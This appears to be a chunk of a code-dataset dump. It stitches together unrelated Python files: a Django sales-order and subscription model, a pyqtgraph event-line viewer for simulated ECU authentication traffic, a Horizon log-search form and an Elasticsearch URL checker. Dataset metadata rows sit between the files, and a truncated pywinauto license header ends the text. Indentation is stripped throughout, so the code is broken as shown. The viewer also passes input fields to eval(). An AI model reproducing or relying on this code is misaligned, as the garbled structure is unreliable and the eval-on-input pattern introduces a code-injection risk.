opportunity = models.ForeignKey(Opportunity, blank=True, null=True, on_delete=models.SET_NULL)
payment = models.ManyToManyField(Transaction, blank=True, null=True)
source = models.ForeignKey(SaleSource)
assigned = models.ManyToManyField(User, related_name = 'sales_saleorder_assigned', blank=True, null=True)
status = models.ForeignKey(SaleStatus)
currency = models.ForeignKey(Currency)
total = models.DecimalField(max_digits=20, decimal_places=2, default=0)
total_display = models.DecimalField(max_digits=20, decimal_places=2, default=0)
details = models.TextField(blank=True, null=True)
access_inherit = ('opportunity', 'client', '*module', '*user')
def fulfil(self):
"Fulfil"
for p in self.orderedproduct_set.all():
if not p.fulfilled:
product = p.product
product.stock_quantity -= p.quantity
product.save()
p.fulfilled = True
p.save()
if p.subscription:
p.subscription.renew()
def get_next_reference(self):
try:
# Very dirty hack, but kinda works for reference (i.e. it doesn't have to be unique)
next_ref = SaleOrder.objects.all().aggregate(models.Max('id'))['id__max']+1
except:
next_ref = 1
full_ref = '%.5d/%s' % (next_ref, str(str(ttime()*10)[8:-2]))
return full_ref
def save(self, *args, **kwargs):
"Automatically set order reference"
super(SaleOrder, self).save(*args, **kwargs)
try:
conf = ModuleSetting.get_for_module('maker.sales', 'order_fulfil_status')[0]
fulfil_status = long(conf.value)
if self.status.id == fulfil_status:
self.fulfil()
except Exception:
pass
def __unicode__(self):
return unicode(self.reference)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_order_view', args=[self.id])
except Exception:
return ""
def get_taxes(self, base=False):
#TODO: Compound taxes
taxes = {}
ops = self.orderedproduct_set.filter(trash=False).filter(tax__isnull=False)
for p in ops:
if base:
item_total = p.get_total()
else:
item_total = p.get_total_display()
if p.tax.id in taxes:
taxes[p.tax.id]['amount']+=(item_total * (p.tax.rate/100)).quantize(Decimal('.01'), rounding = ROUND_UP)
else:
taxes[p.tax.id] = {'name':p.tax.name, 'rate':p.tax.rate,
'amount':(item_total * (p.tax.rate/100))
.quantize(Decimal('.01'), rounding = ROUND_UP)}
return taxes
def get_taxes_total(self):
taxes = self.get_taxes()
total = 0
for tax in taxes.values():
total += tax['amount']
return total
def get_subtotal(self):
sum = 0
for p in self.orderedproduct_set.filter(trash=False):
sum += p.get_total()
self.total = sum
return sum
def get_subtotal_display(self):
sum = 0
for p in self.orderedproduct_set.filter(trash=False):
sum += p.get_total_display()
self.total_display = sum
return sum
def get_total(self):
sum = 0
for p in self.orderedproduct_set.filter(trash=False):
sum += p.get_total()
sum += self.get_taxes_total()
self.total = sum
return sum
def get_total_display(self):
sum = 0
for p in self.orderedproduct_set.filter(trash=False):
sum += p.get_total_display()
sum += self.get_taxes_total()
self.total_display = sum
return sum
def update_total(self):
self.get_total()
self.get_total_display()
self.save()
def get_total_paid(self):
return Decimal(self.payment.filter(trash=False).aggregate(models.Sum('value_display'))['value_display__sum'] or '0')
def balance_due(self):
return self.get_total() - self.get_total_paid()
class Meta:
"SaleOrder"
ordering = ['-datetime']
class Subscription(Object):
"Subscription"
client = models.ForeignKey(Contact, blank=True, null=True, on_delete=models.SET_NULL)
product = models.ForeignKey(Product, blank=True, null=True)
start = models.DateField(default=datetime.now)
expiry = models.DateField(blank=True, null=True)
cycle_period = models.CharField(max_length=32,
choices=(('daily', 'Daily'),
('weekly', 'Weekly'),
('monthly', 'Monthly'),
('quarterly','Quarterly'),
('yearly', 'Yearly')),
default='month')
cycle_end = models.DateField(blank = True, null = True)
active = models.BooleanField(default=False)
details = models.CharField(max_length = 512, blank = True, null = True)
access_inherit = ('client', 'product', '*module', '*user')
def get_cycle_start(self):
"Get the cycle start date"
if not self.cycle_end:
return None
cycle_end = self.cycle_end
#check if we're in the 5 day window before the cycle ends for this subscription
if self.cycle_period == 'monthly':
p = relativedelta(months=+1)
elif self.cycle_period == 'weekly':
p = timedelta(weeks = 1)
elif self.cycle_period == 'daily':
p = timedelta(days = 1)
elif self.cycle_period == 'quarterly':
            p = relativedelta(months=+3)
elif self.cycle_period == 'yearly':
p = relativedelta(years = 1)
else:
p = relativedelta(months=+1)
cycle_start = cycle_end - p
return cycle_start
def renew(self):
"Renew"
if self.cycle_period == 'monthly':
p = relativedelta(months=+1)
elif self.cycle_period == 'daily':
p = timedelta(days = 1)
elif self.cycle_period == 'weekly':
p = timedelta(weeks = 1)
elif self.cycle_period == 'quarterly':
            p = relativedelta(months=+3)
elif self.cycle_period == 'yearly':
p = relativedelta(years = 1)
else:
p = relativedelta(months=+1)
self.cycle_end = datetime.now().date() + p
self.save()
def activate(self):
"Activate"
if self.active:
return
self.renew()
self.active = True
self.save()
def deactivate(self):
"Deactivate"
if not self.active:
return
self.active = False
self.save()
def invoice(self):
"Create a new sale order for self"
new_invoice = SaleOrder()
try:
conf = ModuleSetting.get_for_module('maker.sales', 'default_order_status')[0]
new_invoice.status = long(conf.value)
except Exception:
ss = SaleStatus.objects.all()[0]
new_invoice.status = ss
so = SaleSource.objects.all()[0]
new_invoice.source = so
new_invoice.client = self.client
new_invoice.reference = "Subscription Invoice " + str(datetime.today().strftime('%Y-%m-%d'))
new_invoice.save()
try:
op = self.orderedproduct_set.filter(trash=False).order_by('-date_created')[0]
opn = OrderedProduct()
opn.order = new_invoice
opn.product = self.product
opn.quantity = op.quantity
opn.discount = op.discount
opn.subscription = self
opn.save()
except IndexError:
opn = OrderedProduct()
opn.order = new_invoice
opn.product = self.product
opn.quantity = 1
opn.subscription = self
opn.save()
return new_invoice.reference
def check_status(self):
"""
Checks and sets the state of the subscription
"""
if not self.active:
return 'Inactive'
if self.expiry:
if datetime.now() > datetime.combine(self.expiry, time.min):
self.deactivate()
return 'Expired'
if not self.cycle_end:
self.renew()
cycle_end = self.cycle_end
#check if we're in the 5 day window before the cycle ends for this subscription
if datetime.now().date() >= cycle_end:
cycle_start = self.get_cycle_start()
#if we haven't already invoiced them, invoice them
grace = 3
if (datetime.now().date() - cycle_end > timedelta(days=grace)):
#Subscription has overrun and must be shut down
return self.deactivate()
try:
conf = ModuleSetting.get_for_module('maker.sales', 'order_fulfil_status')[0]
order_fulfil_status = SaleStatus.objects.get(pk=long(conf.value))
except Exception:
order_fulfil_status = None
if self.orderedproduct_set.filter(order__datetime__gte=cycle_start).filter(order__status=order_fulfil_status):
return 'Paid'
elif self.orderedproduct_set.filter(order__datetime__gte=cycle_start):
return 'Invoiced'
else:
self.invoice()
return 'Invoiced'
else:
return 'Active'
def __unicode__(self):
return unicode(self.product)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_subscription_view', args=[self.id])
except Exception:
return ""
class Meta:
"Subscription"
ordering = ['expiry']
class OrderedProduct(Object):
"Ordered Product"
subscription = models.ForeignKey(Subscription, blank=True, null=True)
product = models.ForeignKey(Product)
quantity = models.DecimalField(max_digits=30, decimal_places=2, default=1)
discount = models.DecimalField(max_digits=5, decimal_places=2, default=0)
tax = models.ForeignKey(Tax, blank=True, null=True, on_delete=models.SET_NULL)
rate = models.DecimalField(max_digits=20, decimal_places=2)
rate_display = models.DecimalField(max_digits=20, decimal_places=2, default=0)
order = models.ForeignKey(SaleOrder)
description = models.TextField(blank=True, null=True)
fulfilled = models.BooleanField(default=False)
access_inherit = ('order', '*module', '*user')
def __unicode__(self):
return unicode(self.product)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_ordered_view', args=[self.id])
except Exception:
return ""
def get_total(self):
"Returns total sum for this item"
total = self.rate * self.quantity
if self.discount:
total = total - (total*self.discount/100)
if total < 0:
total = Decimal(0)
return total.quantize(Decimal('.01'),rounding=ROUND_UP)
def get_total_display(self):
"Returns total sum for this item in the display currency"
total = self.rate_display * self.quantity
if self.discount:
total = total - (total*self.discount/100)
if total < 0:
total = Decimal(0)
return total.quantize(Decimal('.01'),rounding=ROUND_UP)
class Meta:
"OrderedProduct"
ordering = ['product']
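# --- Worked example (editor note, not part of the original module) ---
# OrderedProduct.get_total() applies the percentage discount and then rounds
# *up* to the cent, e.g. with rate=Decimal('9.99'), quantity=3, discount=10:
#   9.99 * 3                   -> 29.97
#   29.97 - 29.97 * 10 / 100   -> 26.973
#   quantize('.01', ROUND_UP)  -> Decimal('26.98')
# SaleOrder.get_taxes() quantizes each line item's tax the same way, so order
# totals can differ by a cent or two from a naively rounded grand total.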
|
mit
| -7,272,710,793,605,936,000
| 36.151874
| 124
| 0.552771
| false
| 4.223318
| false
| false
| false
|
PhilippMundhenk/IVNS
|
ECUInteraction/gui/plugins/views/event_line_view_impl.py
|
1
|
21119
|
'''
Created on 27 Apr, 2015
@author: artur.mrowca
'''
from gui.plugins.views.abstract_viewer_plug import AbstractViewerPlugin
from PyQt4.Qt import QWidget
from PyQt4 import QtGui
import pyqtgraph as pg
import numpy as np
from numpy.core.defchararray import isnumeric
from config import can_registration
from io_processing.surveillance_handler import MonitorTags, MonitorInput
from io_processing.result_interpreter.eventline_interpreter import EventlineInterpreter
from tools.general import General
from uuid import UUID
from math import floor
class ECUShowAxis(pg.AxisItem):
def __init__(self, orientation, *args):
pg.AxisItem.__init__(self, orientation, *args)
self.lanes_map = {} # key: number, value: text
def tickValues(self, minVal, maxVal, size):
minVal, maxVal = sorted((minVal, maxVal))
minVal *= self.scale
maxVal *= self.scale
# size *= self.scale
ticks = []
tickLevels = self.tickSpacing(minVal, maxVal, size)
allValues = np.array([])
for i in range(len(tickLevels)):
spacing, offset = tickLevels[i]
spacing = 1
# # determine starting tick
start = (np.ceil((minVal - offset) / spacing) * spacing) + offset
# # determine number of ticks
num = int((maxVal - start) / spacing) + 1
values = (np.arange(num) * spacing + start) / self.scale
# # remove any ticks that were present in higher levels
# # we assume here that if the difference between a tick value and a previously seen tick value
# # is less than spacing/100, then they are 'equal' and we can ignore the new tick.
values = list(filter(lambda x: all(np.abs(allValues - x) > spacing * 0.01), values))
allValues = np.concatenate([allValues, values])
ticks.append((spacing / self.scale, values))
if self.logMode:
return self.logTickValues(minVal, maxVal, size, ticks)
return ticks
def tickStrings(self, values, scale, spacing):
strns = []
for x in values:
try:
text = self.lanes_map[int(x)]
except:
text = ""
strns.append(text)
return strns
class EventlineViewPlugin(AbstractViewerPlugin):
def __init__(self, *args, **kwargs):
AbstractViewerPlugin.__init__(self, *args, **kwargs)
def get_combobox_name(self):
return "Chain of events"
def get_widget(self, parent):
self.gui = EventlineViewPluginGUI(parent)
return self.gui
def get_interpreters(self):
return [EventlineInterpreter]
def link_axis(self):
return self.gui.plot
def load(self, data):
self.gui.load(data)
def save(self):
return self.gui.save()
def update_gui(self, interpreter_input):
self.gui.update_gui(interpreter_input)
class EventlineViewPluginGUI(QWidget):
def __init__(self, parent):
QWidget.__init__(self, parent)
self.lastClicked = []
self._all_points = []
self.create_widgets(parent)
self._lane_map = {}
self._taken_lanes = {}
self.map_points = {}
self.known = []
self.COLOR_ECU_AUTH = (255, 0, 0)
self.COLOR_STR_AUTH = (0, 255, 0)
self.COLOR_SIMPLE = (0, 0, 255)
self.COLOR_PROCESS = (123, 123, 0)
self.COLOR_PROCESS_2 = (0, 123, 123)
self._init_categories()
self._mode = 'LW_AUTH'
self._pts_ecu = {}
def _already_there(self, mon_input):
''' handles duplicates'''
if hash(mon_input) in self.known:
return True
self.known.append(hash(mon_input))
if len(self.known) > 1000:
del self.known[:floor(float(len(self.known)) / 2.0)]
return False
def _clicked(self, plot, points):
for p in self.lastClicked:
p.resetPen()
try: info = points[0].data()
except: info = False
if info:
try: info[5]
except: info += [0, 0, 0, 0, 0]
if len(str(info[2])) > 100:
showos = info[2][:99]
else:
showos = info[2]
self.label.setText("ECU: %s\t\t Time:%s \t\nMessageID: %s \tMessage: %s \t\nSize: %s \t\t\tCorresponding ID: %s \tStream ID: %s" % (info[0], info[-1], self._id_to_str(info[1]), showos, info[3], info[6], info[5]))
for p in points:
p.setPen('b', width=2)
self.lastClicked = points
def _init_categories(self):
# TESLA
self.tesla_time_sync_send = [MonitorTags.CP_SEND_SYNC_MESSAGE, MonitorTags.CP_SEND_SYNC_RESPONSE_MESSAGE]
self.tesla_time_sync_rec = [MonitorTags.CP_RECEIVE_SYNC_RESPONSE_MESSAGE]
self.tesla_setup_send = [MonitorTags.CP_ENCRYPTED_EXCHANGE_FIRST_KEY_KN]
self.tesla_setup_rec = [MonitorTags.CP_RECEIVED_EXCHANGE_FIRST_KEY_KN]
self.tesla_simple_message_send = [MonitorTags.CP_MACED_TRANSMIT_MESSAGE]
self.tesla_simple_message_rec = [MonitorTags.CP_BUFFERED_SIMPLE_MESSAGE]
self.tesla_message_authenticated = [MonitorTags.CP_RETURNED_AUTHENTICATED_SIMPLE_MESSAGE]
self.tesla = self.tesla_time_sync_send + self.tesla_time_sync_rec + self.tesla_setup_send + self.tesla_setup_rec + self.tesla_simple_message_send + self.tesla_simple_message_rec + self.tesla_message_authenticated
# TLS
self.hand_shake_tag_server_send = [MonitorTags.CP_SEND_SERVER_HELLO, MonitorTags.CP_SEND_SERVER_CERTIFICATE, MonitorTags.CP_SEND_SERVER_KEYEXCHANGE, MonitorTags.CP_SEND_CERTIFICATE_REQUEST, MonitorTags.CP_SEND_SERVER_HELLO_DONE, \
MonitorTags.CP_CLIENT_FINISHED_GENERATED_HASH_PRF]
self.hand_shake_tag_server_rec = [MonitorTags.CP_RECEIVE_CLIENT_HELLO, MonitorTags.CP_RECEIVE_CLIENT_CERTIFICATE, MonitorTags.CP_RECEIVE_CLIENT_KEYEXCHANGE, MonitorTags.CP_RECEIVE_CERTIFICATE_VERIFY, MonitorTags.CP_RECEIVED_CHANGE_CIPHER_SPEC, \
MonitorTags.CP_RECEIVE_CLIENT_FINISHED]
self.hand_shake_tag_server_process = [MonitorTags.CP_CLIENT_CERTIFICATE_VALIDATED, MonitorTags.CP_DECRYPTED_CLIENT_KEYEXCHANGE, MonitorTags.CP_DECRYPTED_CERTIFICATE_VERIFY , MonitorTags.CP_GENERATED_MASTER_SECRET_CERT_VERIFY, \
MonitorTags.CP_CLIENT_FINISHED_HASHED_COMPARISON_HASH , MonitorTags.CP_CLIENT_AUTHENTICATED]
self.hand_shake_tag_client_send = [MonitorTags.CP_SEND_CLIENT_HELLO, MonitorTags.CP_SEND_CLIENT_CERTIFICATE , MonitorTags.CP_ENCRYPTED_CLIENT_KEYEXCHANGE , \
MonitorTags.CP_SEND_CIPHER_SPEC , MonitorTags.CP_GENERATED_HASH_FROM_PRF_CLIENT_FINISHED, MonitorTags.CP_GENERATED_HASH_FROM_PRF_SERVER_FINISHED]
self.hand_shake_tag_client_rec = [MonitorTags.CP_RECEIVE_SERVER_HELLO, MonitorTags.CP_RECEIVE_SERVER_CERTIFICATE , MonitorTags.CP_RECEIVE_SERVER_KEYEXCHANGE, \
MonitorTags.CP_RECEIVE_CERTIFICATE_REQUEST, MonitorTags.CP_RECEIVE_SERVER_HELLO_DONE, MonitorTags.CP_RECEIVE_SERVER_FINISHED ]
self.hand_shake_tag_client_process = [MonitorTags.CP_SERVER_HELLO_DONE_VALIDATED_CERT, MonitorTags.CP_ENCRYPTED_CLIENT_KEYEXCHANGE , MonitorTags.CP_GENERATED_MASTERSEC_CLIENT_KEYEXCHANGE , MonitorTags.CP_INIT_SEND_CERTIFICATE_VERIFY, \
MonitorTags.CP_ENCRYPTED_CERTIFICATE_VERIFY, MonitorTags.CP_INIT_CLIENT_FINISHED , MonitorTags.CP_HASHED_CLIENT_FINISHED, MonitorTags.CP_SERVER_FINISHED_HASHED_COMPARISON_HASH , \
MonitorTags.CP_SERVER_FINISHED_GENERATED_HASH_PRF, MonitorTags.CP_INIT_SERVER_FINISHED , MonitorTags.CP_HASHED_SERVER_FINISHED, MonitorTags.CP_SERVER_AUTHENTICATED ]
self.simple_tags_send = [MonitorTags.CP_SESSION_AVAILABLE_SEND_MESSAGE]
self.simple_tags_rec = [ MonitorTags.CP_RECEIVE_SIMPLE_MESSAGE ]
self.tls = self.hand_shake_tag_server_send + self.hand_shake_tag_server_rec + self.hand_shake_tag_server_process + self.hand_shake_tag_client_send + self.hand_shake_tag_client_rec + self.hand_shake_tag_client_process \
+ self.simple_tags_send + self.simple_tags_rec
# authentication
self.sec_mod_tags = [MonitorTags.CP_SEC_INIT_AUTHENTICATION, MonitorTags.CP_SEC_ECNRYPTED_CONFIRMATION_MESSAGE, MonitorTags.CP_SEC_COMPARED_HASH_REG_MSG, \
MonitorTags.CP_SEC_ENCRYPTED_DENY_MESSAGE, MonitorTags.CP_SEC_ENCRYPTED_GRANT_MESSAGE, MonitorTags.CP_SEC_DECRYPTED_REQ_MESSAGE, MonitorTags.CP_SEC_RECEIVE_REG_MESSAGE]
self.authent_tags_send = [MonitorTags.CP_SEC_INIT_AUTHENTICATION, MonitorTags.CP_SEC_ECNRYPTED_CONFIRMATION_MESSAGE, MonitorTags.CP_ECU_SEND_REG_MESSAGE]
self.authent_tags_receive = [MonitorTags.CP_SEC_COMPARED_HASH_REG_MSG, MonitorTags.CP_ECU_VALIDATED_SEC_MOD_CERTIFICATE, MonitorTags.CP_ECU_DECRYPTED_CONF_MESSAGE]
self.author_tags_send = [MonitorTags.CP_SEC_ENCRYPTED_DENY_MESSAGE, MonitorTags.CP_SEC_ENCRYPTED_GRANT_MESSAGE, MonitorTags.CP_ECU_ENCRYPTED_REQ_MESSAGE]
self.author_tags_receive = [MonitorTags.CP_ECU_DECRYPTED_DENY_MESSAGE, MonitorTags.CP_ECU_DECRYPTED_GRANT_MESSAGE, MonitorTags.CP_SEC_DECRYPTED_REQ_MESSAGE]
self.simp_tags_send = [MonitorTags.CP_ECU_ENCRYPTED_SEND_SIMPLE_MESSAGE]
self.simp_tags_receive = [MonitorTags.CP_ECU_DECRYPTED_SIMPLE_MESSAGE]
self.lw_auth = self.sec_mod_tags + self.authent_tags_send + self.authent_tags_receive + self.author_tags_send + self.author_tags_receive + self.simp_tags_send + self.simp_tags_receive
def create_widgets(self, parent):
vbox = QtGui.QVBoxLayout()
self.label = QtGui.QLabel()
self.label.setText("Chainview")
view = pg.GraphicsLayoutWidget(parent)
self.axis = ECUShowAxis(orientation='left')
self.plot = view.addPlot(axisItems={'left': self.axis})
self.plot.setLabel('left', 'ECU ID ')
self.plot.setLabel('bottom', 'Time [sec]')
self.plot.showGrid(x=True, y=True)
vbox.addWidget(self.label)
vbox.addWidget(view)
self.setLayout(vbox)
def save(self):
return self._all_points
def load(self, val_pairs):
self._all_points = val_pairs
spots = []
for val in val_pairs:
x_pos = val[0]
y_pos = val[1]
info = val[2:-2]
arr = np.ndarray(2)
arr[0] = x_pos
arr[1] = y_pos
spots.append({'pos': arr, 'data': info, 'brush':pg.mkBrush(val[-2][0], val[-2][1], val[-2][2], 120), 'symbol': val[-1], 'size': 8})
s2 = pg.ScatterPlotItem(size=10, pen=pg.mkPen('w'), pxMode=True)
s2.addPoints(spots)
self.plot.addItem(s2)
s2.sigClicked.connect(self._clicked)
def _next_security_module_lane(self, id_string):
        # determine the next free lane;
        # if the same element was seen before, return its corresponding lane
if id_string in self._taken_lanes:
return self._taken_lanes[id_string]
try:
num = -int(self._get_last_num(id_string))
except:
num = -1
if num in self._taken_lanes.values():
while True:
num += 1
if num in self._taken_lanes.values():
break
self._taken_lanes[id_string] = num
self.axis.lanes_map[num] = id_string
return num
def _next_ecu_lane(self, id_string):
        # determine the next free lane;
        # if the same element was seen before, return its corresponding lane
if id_string in self._taken_lanes:
return self._taken_lanes[id_string]
try:
num = int(self._get_last_num(id_string))
except:
num = None
if num in self._taken_lanes.values() or num == None:
if num == None: num = 0
while True:
num += 1
if num not in self._taken_lanes.values():
break
self._taken_lanes[id_string] = num
self.axis.lanes_map[num] = id_string
return num
def update_gui(self, monitor_input_lst):
val_pairs = []
# print("Eventmonitor start %s" % monitor_input_lst)
for monitor_input in monitor_input_lst:
if self._already_there(str(monitor_input)): continue
# get ecu ids
if isinstance(monitor_input, str):
for ecu_id in monitor_input_lst:
if not isinstance(ecu_id, str): continue
if isinstance(ecu_id, UUID): continue
self._next_ecu_lane(ecu_id)
continue
if not isinstance(monitor_input, (list, tuple)): continue
# if self._already_there(monitor_input): continue
# Define mode
if eval(monitor_input[3]) in self.tesla:
self._mode = "TESLA"
if eval(monitor_input[3]) in self.tls:
self._mode = "TLS"
if eval(monitor_input[3]) in self.lw_auth:
self._mode = "LW_AUTH"
# extract information
try: t = monitor_input[0]
except: continue
# assign a lane to it
if eval(monitor_input[3]) in self.sec_mod_tags: # security module
id_val = self._next_security_module_lane(monitor_input[1])
else: # ecu
id_val = self._next_ecu_lane(monitor_input[1])
id_val += 0.00000001
# gather information
fst = [t, id_val, monitor_input[1]]
try: scd = [monitor_input[4], monitor_input[5], monitor_input[6], monitor_input[1], monitor_input[7], monitor_input[2], monitor_input[0]] + [t]
except: continue
# Color
color = (0, 0, 0)
symb = 0
if eval(monitor_input[3]) in self.authent_tags_send + self.hand_shake_tag_client_send + self.tesla_time_sync_send:
color = self.COLOR_ECU_AUTH
symb = 0
if eval(monitor_input[3]) in self.authent_tags_receive + self.hand_shake_tag_client_rec + self.tesla_time_sync_rec:
color = self.COLOR_ECU_AUTH
symb = 1
if eval(monitor_input[3]) in self.author_tags_send + self.hand_shake_tag_server_send + self.tesla_setup_send:
color = self.COLOR_STR_AUTH
symb = 0
if eval(monitor_input[3]) in self.author_tags_receive + self.hand_shake_tag_server_rec + self.tesla_setup_rec:
color = self.COLOR_STR_AUTH
symb = 1
if eval(monitor_input[3]) in self.simp_tags_send + self.simple_tags_send + self.tesla_simple_message_send:
color = self.COLOR_SIMPLE
symb = 0
if eval(monitor_input[3]) in self.simp_tags_receive + self.simple_tags_rec + self.tesla_simple_message_rec:
color = self.COLOR_SIMPLE
symb = 1
if eval(monitor_input[3]) in self.tesla_message_authenticated:
color = self.COLOR_PROCESS_2
symb = 2
# if eval(monitor_input[3]) in self.hand_shake_tag_server_process:
# color = self.COLOR_STR_AUTH
# symb = 2
if color == (0, 0, 0): continue
# value pair
val_pairs.append(fst + scd + [color, symb])
spots = []
try: last_free = val_pairs[0][0]
except: last_free = None
for val in val_pairs:
x_pos = val[0]
y_pos = val[1]
info = val[2:-2]
try: info[2] = info[2].get()
except: pass
# Points at same y positions will be shifted to be distinguishable
res = False
try: already_existing = self._pts_ecu[info[0]][x_pos]
except: already_existing = False
if already_existing:
# x_pos = last_free
# find new value
found = False
while not found:
x_pos += 0.00001
try: already_existing = self._pts_ecu[info[0]][x_pos]
except: already_existing = False
if not already_existing:
found = True
# last_free = x_pos
# print(" Plotting x: %s" % x_pos)
General().add_to_three_dict(self._pts_ecu, info[0], x_pos, True)
arr = np.ndarray(2)
arr[0] = x_pos
arr[1] = y_pos
spots.append({'pos': arr, 'data': info, 'brush':pg.mkBrush(val[-2][0], val[-2][1], val[-2][2], 120), 'symbol': val[-1], 'size': 8})
s2 = pg.ScatterPlotItem(size=10, pen=pg.mkPen('w'), pxMode=True)
s2.addPoints(spots)
self.plot.addItem(s2)
s2.sigClicked.connect(self._clicked)
self._all_points += val_pairs
# self.map_points[str(s2[0])]
# print("Eventmonitor end")
def _get_last_num(self, stri):
num = ""
for el in stri[::-1]:
if isnumeric(el):
num += el
else:
break
return num[::-1]
def _id_to_str(self, msg_id):
if self._mode == "TLS":
if msg_id == can_registration.CAN_TLS_CERTIFICATE:
return "Client Certificate"
if msg_id == can_registration.CAN_TLS_CERTIFICATE_REQUEST:
return "Certificate Request"
if msg_id == can_registration.CAN_TLS_CERTIFICATE_VERIFY:
return "Certificate Verify"
if msg_id == can_registration.CAN_TLS_CHANGE_CIPHER_SPEC:
return "Change Cipher Spec"
if msg_id == can_registration.CAN_TLS_CLIENT_HELLO:
return "ClientHello"
if msg_id == can_registration.CAN_TLS_CLIENT_KEY_EXCHANGE:
return "Client Key Exchange"
if msg_id == can_registration.CAN_TLS_FINISHED:
return "Finished "
if msg_id == can_registration.CAN_TLS_SERVER_CERTIFICATE:
return "Server Certificate "
if msg_id == can_registration.CAN_TLS_SERVER_HELLO:
return "ServerHello "
if msg_id == can_registration.CAN_TLS_SERVER_HELLO_DONE:
return "ServerHelloDone "
if msg_id == can_registration.CAN_TLS_SERVER_KEY_EXCHANGE:
return "ServerKeyExchange "
if self._mode == "LW_AUTH":
if msg_id == can_registration.CAN_ECU_AUTH_ADVERTISE:
return "ECU Advertisement"
if msg_id == can_registration.CAN_ECU_AUTH_CONF_MSG:
return "Confirmation Message"
if msg_id == can_registration.CAN_ECU_AUTH_REG_MSG:
return "Registration Message"
if msg_id == can_registration.CAN_STR_AUTH_DENY_MSG:
return "Deny Message"
if msg_id == can_registration.CAN_STR_AUTH_GRANT_MSG:
return "Grant Message"
if msg_id == can_registration.CAN_STR_AUTH_INIT_MSG_STR:
return "Request Message"
if self._mode == "TESLA":
if msg_id == can_registration.CAN_TESLA_TIME_SYNC:
return "Time Sync"
if msg_id == can_registration.CAN_TESLA_TIME_SYNC_RESPONSE:
return "Time Sync Response"
if msg_id == can_registration.CAN_TESLA_KEY_EXCHANGE:
return "Key Exchange"
return msg_id
def _is_sec_mod(self, ecu):
try:
ecu._SECMODULE
return True
except:
pass
return False
|
mit
| -4,896,457,529,280,774,000
| 41.751012
| 253
| 0.551541
| false
| 3.777996
| false
| false
| false
|
NECCSiPortal/NECCSPortal-dashboard
|
nec_portal/dashboards/project/history/forms.py
|
1
|
2741
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from django.core.urlresolvers import reverse_lazy
from django import shortcuts
from django.utils.translation import ugettext_lazy as _
from horizon import forms
from horizon import messages
class HistoryForm(forms.SelfHandlingForm):
search = forms.CharField(label=_('Keyword'),
required=False,
max_length=255,
help_text=_(
'[1]Regular expression is available.'
'(Ex.)"user_name:demo*" '
'returns all the logs of users whose '
'name beginning with "demo". '
'[2]All columns are searched when no '
'columns are selected. '
'[3]AND/OR/NOT search operators are '
'supported.(Ex.)"user_name:demo '
'AND POST" returns POST logs of '
'user "demo".'))
start = forms.DateField(label=_('From:'),
input_formats=("%Y-%m-%d",))
end = forms.DateField(label=_('To:'),
input_formats=("%Y-%m-%d",))
def __init__(self, *args, **kwargs):
super(HistoryForm, self).__init__(*args, **kwargs)
self.fields['start'].widget.attrs['data-date-format'] = "yyyy-mm-dd"
self.fields['end'].widget.attrs['data-date-format'] = "yyyy-mm-dd"
def clean(self):
cleaned_data = self.cleaned_data
start_date = cleaned_data.get('start', None)
end_date = cleaned_data.get('end', None)
if start_date and end_date and start_date > end_date:
messages.error(self.request,
_('Invalid time period. The end date should be '
'more recent than the start date.'))
return cleaned_data
def handle(self, request, data):
response = shortcuts.redirect(
reverse_lazy("horizon:project:history:index"))
return response
|
apache-2.0
| -1,124,052,965,189,229,300
| 43.209677
| 76
| 0.551988
| false
| 4.478758
| false
| false
| false
|
thefourtheye/elasticsearch-monitoring
|
url_checker.py
|
1
|
2079
|
from master import get_conn
try:
import simplejson as json
except ImportError:
import json
with open("urls.json") as f:
urls_data = json.load(f)
def sort(x):
return (x.get("success", False), x.get("url", ""))
def table(title, l):
temp = """
<table width='100%' border=1 cellpadding=3 cellspacing=0>
<caption>{0}</caption>
<tr><th>Expected</th><th>Actual</th><th>URL</th></tr>
""".format(title)
for item in sorted(l, key=sort):
temp += "<tr><td>" + "</td><td>".join([
str(item["expected"] or ""),
str(item["actual"] or ""),
str(item["url"] or "")
]) + "</td></tr>"
return temp + "</table><br/>"
def url_checker():
results = {
"severity": "INFO",
"title": "URLs Checker",
"body": ""
}
responses = []
for key, value in urls_data.items():
res, _, conn = get_conn(value.get("host"), value)[0]
expected = value.get("expectedHTTPCode", 200)
url = "{0}://{1}{2}".format(
value.get("protocol", "http"),
value.get("host", ""),
value.get("path", "")
)
result = {
"success": True,
"expected": expected,
"url": url
}
if res:
try:
r1 = conn(value.get("path", ""))
r1.read()
result.update({
"success": int(r1.status) == expected,
"actual": r1.status
})
            except Exception as ex:
result.update({
"success": False,
"actual": str(ex)
})
else:
result.update({
"success": False,
"actual": "Unable to establish connection to {0}".format(url)
})
responses.append(result)
if any(not r.get("success", False) for r in responses):
results["severity"] = "FATAL"
results["body"] = table("URLs Checker", responses)
return results
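# --- Illustrative config sketch (editor note, not part of the original file) ---
# urls.json is not shown here; judging from the fields read above (host,
# protocol, path, expectedHTTPCode), an entry presumably looks something like:
#
#   {
#       "cluster-health": {
#           "host": "es.example.com",
#           "protocol": "http",
#           "path": "/_cluster/health",
#           "expectedHTTPCode": 200
#       }
#   }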
|
mit
| -1,274,268,218,179,104,300
| 26.72
| 77
| 0.46176
| false
| 3.930057
| false
| false
| false
|
MagazinnikIvan/pywinauto
|
pywinauto/timings.py
|
1
|
14481
|
# GUI Application automation and testing library
# Copyright (C) 2006-2017 Mark Mc Mahon and Contributors
# https://github.com/pywinauto/pywinauto/graphs/contributors
# http://pywinauto.readthedocs.io/en/latest/credits.html
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of pywinauto nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
